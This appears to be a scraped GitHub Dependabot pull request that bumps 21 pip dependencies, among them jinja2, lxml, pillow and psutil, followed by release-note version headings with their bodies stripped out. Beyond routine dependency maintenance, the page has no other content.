3.1.4 - [Release notes](https://github.com/pallets/jinja/releases) - [Changelog](https://github.com/pallets/jinja/blob/main/CHANGES.rst) - [Commits](pallets/jinja@2.7.2...3.1.4) Updates `lxml` from 2.2.6 to 4.9.1 - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/commits/lxml-4.9.1) Updates `pillow` from 2.3.0 to 10.3.0 - [Release notes](https://github.com/python-pillow/Pillow/releases) - [Changelog](https://github.com/python-pillow/Pillow/blob/main/CHANGES.rst) - [Commits](python-pillow/Pillow@2.3.0...10.3.0) Updates `simplejson` from 2.3.2 to 2.6.1 - [Release notes](https://github.com/simplejson/simplejson/releases) - [Changelog](https://github.com/simplejson/simplejson/blob/master/CHANGES.txt) - [Commits](simplejson/simplejson@v2.3.2...v2.6.1) Updates `django-debug-toolbar` from 1.2 to 1.11.1 - [Release notes](https://github.com/jazzband/django-debug-toolbar/releases) - [Changelog](https://github.com/jazzband/django-debug-toolbar/blob/1.11.1/docs/changes.rst) - [Commits](django-commons/django-debug-toolbar@1.2...1.11.1) Updates `psutil` from 0.2.0 to 5.6.6 - [Changelog](https://github.com/giampaolo/psutil/blob/master/HISTORY.rst) - [Commits](giampaolo/psutil@release-0.2.0...release-5.6.6) --- updated-dependencies: - dependency-name: babel dependency-type: direct:production dependency-group: pip - dependency-name: bleach dependency-type: direct:production dependency-group: pip - dependency-name: celery dependency-type: direct:production dependency-group: pip - dependency-name: django dependency-type: direct:production dependency-group: pip - dependency-name: django-filter dependency-type: direct:production dependency-group: pip - dependency-name: djangorestframework dependency-type: direct:production dependency-group: pip - dependency-name: gitpython dependency-type: direct:production dependency-group: pip - dependency-name: gunicorn dependency-type: direct:production dependency-group: pip - dependency-name: html5lib dependency-type: direct:production dependency-group: pip - dependency-name: httplib2 dependency-type: direct:production dependency-group: pip - dependency-name: oauth2 dependency-type: direct:production dependency-group: pip - dependency-name: protobuf dependency-type: direct:production dependency-group: pip - dependency-name: pymysql dependency-type: direct:production dependency-group: pip - dependency-name: requests dependency-type: direct:production dependency-group: pip - dependency-name: suds dependency-type: direct:production dependency-group: pip - dependency-name: jinja2 dependency-type: direct:production dependency-group: pip - dependency-name: lxml dependency-type: direct:production dependency-group: pip - dependency-name: pillow dependency-type: direct:production dependency-group: pip - dependency-name: simplejson dependency-type: direct:production dependency-group: pip - dependency-name: django-debug-toolbar dependency-type: direct:development dependency-group: pip - dependency-name: psutil dependency-type: direct:production dependency-group: pip ... Signed-off-by: dependabot[bot] <[email protected]>

dependabot bot added the dependencies Pull requests that update a dependency file label Jun 26, 2024

Bump the pip group across 1 directory with 21 updates #8

Are you sure you want to change the base?

Bump the pip group across 1 directory with 21 updates #8

Conversation

dependabot bot commented on behalf of github Jun 26, 2024

Version 2.9.1

Bugfixes

Version 2.9.0

Upcoming version support changes

Improvements

Bugfixes

Documentation

Version 2.8.1

Version 2.8.0

Improvements

Bugfixes

Docs

Version 2.9.1

Version 2.9.0

Version 3.3.0 (February 1st, 2021)

Version 3.2.3 (January 26th, 2021)

Version 3.2.2 (January 20th, 2021)

5.2.2

v5.2.1

5.2.2

5.2.1

Version 2.4.0

Version 2.3.0

Version 2.2

Version 2.1.0

Version 2.0

Version 2.4.0 (2020-9-27)

Version 2.3.0 (2020-6-5)

Version 2.2 (2019-7-16)

Version 2.1 (2019-1-20)

Version 3.15.1

What's Changed

New Contributors

Version 3.14.0

Version 3.13.1

Version 3.13.0

3.12.4

3.1.41 - fix Windows security issue

What's Changed

Gunicorn 22.0 has been released

Gunicorn 21.2.0 has been released

Protocol Buffers v3.18.3

C++

Protocol Buffers v3.18.2

Java

Protocol Buffers v3.18.1

Python

Ruby

Protocol Buffers v3.18.0

C++